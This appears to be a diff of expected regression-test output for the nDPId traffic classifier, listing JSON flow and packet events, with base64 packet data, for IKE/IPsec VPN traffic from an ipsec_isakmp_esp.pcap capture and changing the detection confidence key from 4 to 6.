00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMfEZAAD8R0p7AqAJkbe27gjikEZQAeEKcAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMIAAAAAgAAAGwwAABQ4uWpvKvs0+Grd38C+Ik2kAU8jJda\/\/ZCHQQBPzJXFKXfyLyFjecJewBE8lyFFdf5WHr93Xl19FueaRtvNm5eWTihSgwraMBcuUWyzQ=="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01007{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":458,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":458,"pkt_l4_len":424,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAG8AURAAP0RjjHAqAJkbe27waZhEZQBqLXBAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMIAAAAAQAAAZwjAAGAFzlsP7YgimBjfIhMJEPhZdw0CnuZSvY37VZC7a055Lu7e+IEFmagHoqj\/3VU94cqC6SemXaaay0d\/2HUKJiZnpCAdCpw2HQ0KrTFW857JbKQ5j3IjKxRjcUYXqtMskX1DsgbCtObqa65cF5WltmtdmwVSANhLzG0LAR+CYEUUulm5YiOyMOFPbHpSrtDM2EEADmkbnPxO00Rexy0LvWXHDnINrIOiYbG6hzWEPIEI9Eq\/yH+hgIb4D\/vUKMOXGmPYj6eX3YPkbs08cGm1IBTDEzAwFQ6+Dut0IKwpkVjd+zPi5GajMElxeEZqtJlXKjo9Q5m9\/Z280gMX0Ev66KMtd6K6mBxkfkxU48zqh5WNlzUeROBsXFhnHi99g6+xt5SosQj2gpfId\/yriJfKS5T7sFkMpq5UCC9LwpNDHHYOliSKEorplbbZFT5pCqGgvpGJkdN1m+eylUPZy+lsCygyTo96r1KrC7wKmw+U5ttVkc6oJ49jPR1mswYgKs="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsDNQAAPcRyXFt7bvBwKgCZBGUpmEA2LFTAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMgAAAAAQAAAMwkAACwt8DrlJ+m2al2nqC6R0IPssF2L9y4SqKRlJmL3oRcq8RKQ2ObMHo4zQyEslOWTLC32j2ahp4JmnhkcJsAT1Ry5ttL3i23NLV5nDm5L7NCBAUkcaeumkXhzzHIEE7JLNBFfwKX9ajX1xrYBwFX63nezSYk14HlosNo\/wudM5KsK1FFycc\/dtaMmPuiBcgAypmEGH8GzTU8DwauD7bD0L3m78gqkvO5SOE4lAbfug=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMAUVAAP0Rj2DAqAJkbe27waZhEZQAeI5AAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMIAAAAAgAAAGwwAABQFzlsP7YgimBjfIhMJEPhZfNKbhKkUop45dKn+ZaQvlBgZFipb1gl3b\/yGDnUYTjHBXhpSa2HaEtAKP+u9gU0mUFlekP9JG9k5fmbAw=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAUBAAP0RjoXAqAJkbe27waZhAfQBWFaoeYM\/SkK01zcAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAAAYLYUGuZ6wRrF76F6Wg4SSmTXUbMrt\/uvkUwBae6Z8ffl31Qp9Pe8kpQLuvpdgDfuC1lFI5d2eInFhSKN2p5l2MMxLCVh5vAZdUmYBGKNydDABJoY\/t2cMJAQMYGrAiasUQAFL5ua2kwx4aur4JnIDxYlsa+kOEok7rfcNe567iikAABhGdIqQZwLuydnmghUWKRm0Vg7igikAABwAAEAERAVvgCvrSECDMOeubOqiQEdUN7AAAAAcAABABWB6cf2AaUay5FZ3OLynoSnQ1+Y8"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQCh8AAPcRzMJt7bvBwKgCZAH0pmEAPMlxeYM\/SkK01zcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWNOkd\/egKWX5A4HacWg=="} 00928{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAUFAAP0RjmzAqAJkbe27waZhAfQBcKqaeYM\/SkK01zcAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFWNOkd\/egKWX5A4HacWiIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAAAYLYUGuZ6wRrF76F6Wg4SSmTXUbMrt\/uvkUwBae6Z8ffl31Qp9Pe8kpQLuvpdgDfuC1lFI5d2eInFhSKN2p5l2MMxLCVh5vAZdUmYBGKNydDABJoY\/t2cMJAQMYGrAiasUQAFL5ua2kwx4aur4JnIDxYlsa+kOEok7rfcNe567iikAABhGdIqQZwLuydnmghUWKRm0Vg7igikAABwAAEAERAVvgCvrSECDMOeubOqiQEdUN7AAAAAcAABABWB6cf2AaUay5FZ3OLynoSnQ1+Y8"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkKtJAAD8RITvAqAJkbe27wikEAfQDEM\/xKPIIUorA8+QAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAJx3HsMOdjlF+2jUdSeOgUoJKgSkDnrRj+AmqkvL4\/btxDWIa5wgFzCzeQ3x7y72e5UHhqhgvqaYk9jfMQxIVaEW9a\/BsTbbgWHzjuQA+m2wB7LvhFjGB\/zN7IPBMezDEAF2Voyii81jTpzUUJ05HhmyiH0d\/igIqUo6S0VxBu\/wKQAAJJlGk0qPBMMAQyO8c7OtV6h+5wY2ebevcS4SnFRIjN85KQAAHAAAQASbEuzBi4qstlq61cC7lLKgnoRv5wAAABwAAEAFpnJT+g+x5l9EQfvU7Io35Af4zqQ="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQIF8AAPcRtoFt7bvCwKgCZAH0KQQAPB4RKPIIUorA8+QAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSaC4DsICzoX86f4Vpg=="} 01517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8KtVAAD8RISDAqAJkbe27wikEAfQDKNhWKPIIUorA8+QAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFWSaC4DsICzoX86f4VpiIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAJx3HsMOdjlF+2jUdSeOgUoJKgSkDnrRj+AmqkvL4\/btxDWIa5wgFzCzeQ3x7y72e5UHhqhgvqaYk9jfMQxIVaEW9a\/BsTbbgWHzjuQA+m2wB7LvhFjGB\/zN7IPBMezDEAF2Voyii81jTpzUUJ05HhmyiH0d\/igIqUo6S0VxBu\/wKQAAJJlGk0qPBMMAQyO8c7OtV6h+5wY2ebevcS4SnFRIjN85KQAAHAAAQASbEuzBi4qstlq61cC7lLKgnoRv5wAAABwAAEAFpnJT+g+x5l9EQfvU7Io35Af4zqQ="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMKt9AAD8RIQbAqAJkbe27wjikEZQDOIC8AAAAACjyCFKKwPPkEtTszwKEz4IuICMIAAAAAQAAAywjAAMQd3Fb1jcelHxTVe\/2g8zj76uIg+8eKH8u+8QF+mNPeDJgsw4h2X4zU7etZzV3p7z0YxmJf5uRbi2o6wBWX928PPHxu4H8aPAm4xpIDdoHfgekjdTUgxlE8sqcL9I3c9J9O6LrK0ZkaQC3qjj1M+iyBNV\/\/tKiCzB1FnooNlXDx34GIR3OZsJZO2sSFnKY0ayWw0t6+E4bvW8F4OScDaoq3NOsIN1j42xm64tbn0b8tRzQw3Rxf1j02PuVTkQUYaYXN66Dwr\/olWo4FGPLm3TsZAYhwpbhDyAgddF9qJaJ9yCchNdNF5qUhpSOjYujXNmeg13l13ZprAKS1AF7roe\/W\/TKSlYvsZTqdXNnNirv\/CGa281gDGSwNPqHT4ng1kr9Py+LDxhT1Xt4DB3ZkNCrj9Ar0\/dAuVTg5DdxTeMR6fnGKEShzFOYocqfaSHNbSW81hS3GcGLGENWWJDKQdAVaDmXhW+wUIcccPD8d+gJxpwUns1GebpdvHORZ6U16WRlMFhbJYznKE86SPL478qqc5YEMCqbFMYENZx3aa2g7BY9\/ognKR00zfD\/OOZnmC\/LO1i1Hytf9iNqisx7GlwgAEKNHmcLnmD\/IOuAltGaTroxV2XAlF5QDKx8ZA4ymT6mfhy0E85T4+hw9D6rqU\/Znl0TOiqL9rSFhGp0T4RDBSYkRLmYYFMKk9YEdQsOHhdXqsA203XlTSg2RDhMev\/LxaObttZhGUehoha5Huvu7HxWyDrAWnjIRvSo+n51OHQsCpeyWZ4xoKF9XoJu4QB36L9zgSxGbU5AJfQdOdTfGRC8XxtFVRkGR5QKJXqpwAQThCRy5mlogO6nRUUVL94WSR4qizsYsPrzoHmaNO3KP5++h+YHRjNi5kZipOzu6Al1aY1kEI9Q9T0\/I5fqQgm9I3I6XLLKZ2f1lg8f\/l8TYt0g0pBHSKkDZnOsMMgVwUWaep1BtFEzds85\/gck0joMeSfrr4sz+hNs3GPMVRNI4qIH5v5y0t5Y9PP\/DUBSqwNGKU0aw4aUGztHDzqs"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsIdQAAPcRtHBt7bvCwKgCZBGUOKQA2IOhAAAAACjyCFKKwPPkEtTszwKEz4IuICMgAAAAAQAAAMwkAACwPfbHDUoskxSE5gSUwdfwN6znE\/N7RTjtK44\/DHvn\/\/wwexFQR+bVEpZtp0gTHsHNqUIlLIKHA\/jLWQUdr39M6fjLR9bEnM8bZDOpQoG1FAcUSplJnPky0MftH5FxtXAehv64FgvOmL6ZyUgZev9MgFt3Az+PptEJz6VuLX9fAIliBAE6dzplUiTUzxnJwEflrSTBoQjIhF\/lTF73bdS664b4qJIcOOLwwqHWuQ=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMK0BAAD8RI2XAqAJkbe27wjikEZQAeGpmAAAAACjyCFKKwPPkEtTszwKEz4IuICMIAAAAAgAAAGwwAABQaLfgxnYqNgq2qxmD+Hya19TPQcBLhoYD2BdkF4EMrXTi21s3PaExuSQZpbAyQi70XIBl8RNR\/wXOMFYcsm\/GKhZRmEeJiOHHY9bmSQ=="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAHMAv1AAP0RjGfAqAJkbe27wqKSEZQBuF26AAAAAA0wAwLs3PExCE8kgQKA2sMuICMIAAAAAQAAAawjAAGQhVi3P8yzTfHmuI+q40jjfulhmdzYtghBgvrDfHSgYMHGAg2XU9i\/iOgQjyoTY0TYwfvwlijcEIjIzvAbmCqFJUGCB7uzk8JYV1tb1\/YeDhlRfxzft7yHQO3Ef6p28zkuy8rFdFHF7cET9dB0T9UH4lrmMn7TnQw9oUo1fE2lfQyfnpiGB9uSMq+5XNwegEiW7Nw1hb7cs3Be1fS9wwjgXaN2fWfGFNwZF4Bt6ctrjJbmJtMZtXFW9oJ68+mOel2Tq98ZCnnxPX1WsHWoVKSoa0mFFCVz12Zv+T2SRqM1XDU2D\/uzP5EkyXj5wBuUeWYas7JM+IsPF3WZiUzkRkRsF8mzmAEYcS5DjYBLnA1yeNjf2ou1C4A2+9xs8FiE9d5nKnZdo8S\/uRCxBLHweET4Z8rlH5y\/wPttmRjEJXclMVHwSGXStxNWhbQ8yequ3Oj\/iUJV059Ua27OpFQlxw6eychcRPl6ukaA7Loq37Dk+iYqh3xE\/eBHDu5spJ4iZwuTzGEFjIIJjEgu7Fci"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 